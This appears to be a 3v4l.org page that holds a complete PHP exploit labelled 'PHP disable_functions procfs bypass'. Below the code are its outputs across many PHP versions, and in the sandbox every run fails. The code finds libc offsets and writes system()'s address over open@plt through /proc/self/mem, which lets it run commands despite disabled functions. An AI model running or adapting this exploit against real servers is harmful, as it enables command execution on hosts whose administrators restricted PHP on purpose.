3v4l.org

run code in 300+ PHP versions simultaneously
<?php /* $libc_ver: beched@linuxoid ~ $ php -r 'readfile("/proc/self/maps");' | grep libc 7f3dfa609000-7f3dfa7c4000 r-xp 00000000 08:01 9831386 /lib/x86_64-linux-gnu/libc-2.19.so $open_php: beched@linuxoid ~ $ objdump -R /usr/bin/php | grep '\sopen$' 0000000000e94998 R_X86_64_JUMP_SLOT open $system_offset and $open_offset: beched@linuxoid ~ $ readelf -s /lib/x86_64-linux-gnu/libc-2.19.so | egrep "\s(system|open)@@" 1337: 0000000000046530 45 FUNC WEAK DEFAULT 12 system@@GLIBC_2.2.5 1679: 00000000000ec150 90 FUNC WEAK DEFAULT 12 open@@GLIBC_2.2.5 */ function packlli($value) { $higher = ($value & 0xffffffff00000000) >> 32; $lower = $value & 0x00000000ffffffff; return pack('V2', $lower, $higher); } function unp($value) { return hexdec(bin2hex(strrev($value))); } function parseelf($bin_ver, $rela = false) { $bin = file_get_contents($bin_ver); $e_shoff = unp(substr($bin, 0x28, 8)); $e_shentsize = unp(substr($bin, 0x3a, 2)); $e_shnum = unp(substr($bin, 0x3c, 2)); $e_shstrndx = unp(substr($bin, 0x3e, 2)); for($i = 0; $i < $e_shnum; $i += 1) { $sh_type = unp(substr($bin, $e_shoff + $i * $e_shentsize + 4, 4)); if($sh_type == 11) { // SHT_DYNSYM $dynsym_off = unp(substr($bin, $e_shoff + $i * $e_shentsize + 24, 8)); $dynsym_size = unp(substr($bin, $e_shoff + $i * $e_shentsize + 32, 8)); $dynsym_entsize = unp(substr($bin, $e_shoff + $i * $e_shentsize + 56, 8)); } elseif(!isset($strtab_off) && $sh_type == 3) { // SHT_STRTAB $strtab_off = unp(substr($bin, $e_shoff + $i * $e_shentsize + 24, 8)); $strtab_size = unp(substr($bin, $e_shoff + $i * $e_shentsize + 32, 8)); } elseif($rela && $sh_type == 4) { // SHT_RELA $relaplt_off = unp(substr($bin, $e_shoff + $i * $e_shentsize + 24, 8)); $relaplt_size = unp(substr($bin, $e_shoff + $i * $e_shentsize + 32, 8)); $relaplt_entsize = unp(substr($bin, $e_shoff + $i * $e_shentsize + 56, 8)); } } if($rela) { for($i = $relaplt_off; $i < $relaplt_off + $relaplt_size; $i += $relaplt_entsize) { $r_offset = unp(substr($bin, $i, 8)); $r_info = unp(substr($bin, $i + 8, 8)) >> 32; $name_off = unp(substr($bin, $dynsym_off + $r_info * $dynsym_entsize, 4)); $name = ''; $j = $strtab_off + $name_off - 1; while($bin[++$j] != "\0") { $name .= $bin[$j]; } if($name == 'open') { return $r_offset; } } } else { for($i = $dynsym_off; $i < $dynsym_off + $dynsym_size; $i += $dynsym_entsize) { $name_off = unp(substr($bin, $i, 4)); $name = ''; $j = $strtab_off + $name_off - 1; while($bin[++$j] != "\0") { $name .= $bin[$j]; } if($name == '__libc_system') { $system_offset = unp(substr($bin, $i + 8, 8)); } if($name == '__open') { $open_offset = unp(substr($bin, $i + 8, 8)); } } return array($system_offset, $open_offset); } } echo "[*] PHP disable_functions procfs bypass (coded by Beched, RDot.Org)\n"; if(strpos(php_uname('a'), 'x86_64') === false) { echo "[-] This exploit is for x64 Linux. Exiting\n"; exit; } if(substr(php_uname('r'), 0, 4) < 2.98) { echo "[-] Too old kernel (< 2.98). Might not work\n"; } echo "[*] Trying to get open@plt offset in PHP binary\n"; $open_php = parseelf('/proc/self/exe', true); if($open_php == 0) { echo "[-] Failed. Exiting\n"; exit; } echo '[+] Offset is 0x' . dechex($open_php) . "\n"; $maps = file_get_contents('/proc/self/maps'); preg_match('#\s+(/.+libc\-.+)#', $maps, $r); echo "[*] Libc location: $r[1]\n"; echo "[*] Trying to get open and system symbols from Libc\n"; list($system_offset, $open_offset) = parseelf($r[1]); if($system_offset == 0 or $open_offset == 0) { echo "[-] Failed. Exiting\n"; exit; } echo "[+] Got them. Seeking for address in memory\n"; $mem = fopen('/proc/self/mem', 'rb'); fseek($mem, $open_php); $open_addr = unp(fread($mem, 8)); echo '[*] open@plt addr: 0x' . dechex($open_addr) . "\n"; $libc_start = $open_addr - $open_offset; $system_addr = $libc_start + $system_offset; echo '[*] system@plt addr: 0x' . dechex($system_addr) . "\n"; echo "[*] Rewriting open@plt address\n"; $mem = fopen('/proc/self/mem', 'wb'); fseek($mem, $open_php); if(fwrite($mem, packlli($system_addr))) { echo "[+] Address written. Executing cmd\n"; readfile('/usr/bin/id'); exit; } echo "[-] Write failed. Exiting\n";
Output for 8.0.0 - 8.0.12, 8.0.14 - 8.0.30, 8.1.0 - 8.1.28, 8.2.0 - 8.2.18, 8.3.0 - 8.3.6
[*] PHP disable_functions procfs bypass (coded by Beched, RDot.Org) [*] Trying to get open@plt offset in PHP binary Warning: file_get_contents(): open_basedir restriction in effect. File(/proc/self/exe) is not within the allowed path(s): (/tmp:/in:/etc) in /in/UXumO on line 34 Warning: file_get_contents(/proc/self/exe): Failed to open stream: Operation not permitted in /in/UXumO on line 34 Warning: Undefined variable $relaplt_off in /in/UXumO on line 59 Warning: Undefined variable $relaplt_off in /in/UXumO on line 59 Warning: Undefined variable $relaplt_size in /in/UXumO on line 59 [-] Failed. Exiting
Output for 8.0.13
[*] PHP disable_functions procfs bypass (coded by Beched, RDot.Org) [*] Trying to get open@plt offset in PHP binary [+] Offset is 0x10006a0 Warning: Undefined array key 1 in /in/UXumO on line 109 [*] Libc location: [*] Trying to get open and system symbols from Libc Warning: Undefined array key 1 in /in/UXumO on line 111 Fatal error: Uncaught ValueError: Path cannot be empty in /in/UXumO:34 Stack trace: #0 /in/UXumO(34): file_get_contents('') #1 /in/UXumO(111): parseelf(NULL) #2 {main} thrown in /in/UXumO on line 34
Process exited with code 255.
Output for 7.4.33
[*] PHP disable_functions procfs bypass (coded by Beched, RDot.Org) [*] Trying to get open@plt offset in PHP binary [+] Offset is 0x10006b8 Notice: Undefined offset: 1 in /in/UXumO on line 109 [*] Libc location: [*] Trying to get open and system symbols from Libc Notice: Undefined offset: 1 in /in/UXumO on line 111 Warning: file_get_contents(): Filename cannot be empty in /in/UXumO on line 34 Notice: Undefined variable: dynsym_off in /in/UXumO on line 74 Notice: Undefined variable: dynsym_off in /in/UXumO on line 74 Notice: Undefined variable: dynsym_size in /in/UXumO on line 74 Notice: Undefined variable: system_offset in /in/UXumO on line 88 Notice: Undefined variable: open_offset in /in/UXumO on line 88 [-] Failed. Exiting
Output for 7.0.0 - 7.0.33, 7.1.0 - 7.1.33, 7.2.0 - 7.2.33, 7.3.0 - 7.3.31, 7.4.0 - 7.4.32
[*] PHP disable_functions procfs bypass (coded by Beched, RDot.Org) [*] Trying to get open@plt offset in PHP binary Warning: file_get_contents(): open_basedir restriction in effect. File(/proc/self/exe) is not within the allowed path(s): (/tmp:/in:/etc) in /in/UXumO on line 34 Warning: file_get_contents(/proc/self/exe): failed to open stream: Operation not permitted in /in/UXumO on line 34 Notice: Undefined variable: relaplt_off in /in/UXumO on line 59 Notice: Undefined variable: relaplt_off in /in/UXumO on line 59 Notice: Undefined variable: relaplt_size in /in/UXumO on line 59 [-] Failed. Exiting
Output for 7.3.32 - 7.3.33
[*] PHP disable_functions procfs bypass (coded by Beched, RDot.Org) [*] Trying to get open@plt offset in PHP binary [+] Offset is 0xfac5e0 [*] Libc location: [*] Trying to get open and system symbols from Libc Warning: file_get_contents(): Filename cannot be empty in /in/UXumO on line 34 [-] Failed. Exiting
Output for 5.5.0 - 5.5.38, 5.6.0 - 5.6.40
[*] PHP disable_functions procfs bypass (coded by Beched, RDot.Org) [*] Trying to get open@plt offset in PHP binary Warning: file_get_contents(): open_basedir restriction in effect. File(/proc/self/exe) is not within the allowed path(s): (/tmp:/in:/etc) in /in/UXumO on line 34 Warning: file_get_contents(/proc/self/exe): failed to open stream: Operation not permitted in /in/UXumO on line 34 Notice: Undefined variable: relaplt_off in /in/UXumO on line 59 Notice: Undefined variable: relaplt_size in /in/UXumO on line 59 Notice: Undefined variable: relaplt_off in /in/UXumO on line 59 [-] Failed. Exiting
Output for 5.4.0 - 5.4.45
[*] PHP disable_functions procfs bypass (coded by Beched, RDot.Org) [*] Trying to get open@plt offset in PHP binary Notice: Undefined variable: relaplt_off in /in/UXumO on line 59 Notice: Undefined variable: relaplt_size in /in/UXumO on line 59 Notice: Undefined variable: relaplt_off in /in/UXumO on line 59 [-] Failed. Exiting
preferences:
269.93 ms | 402 KiB | 372 Q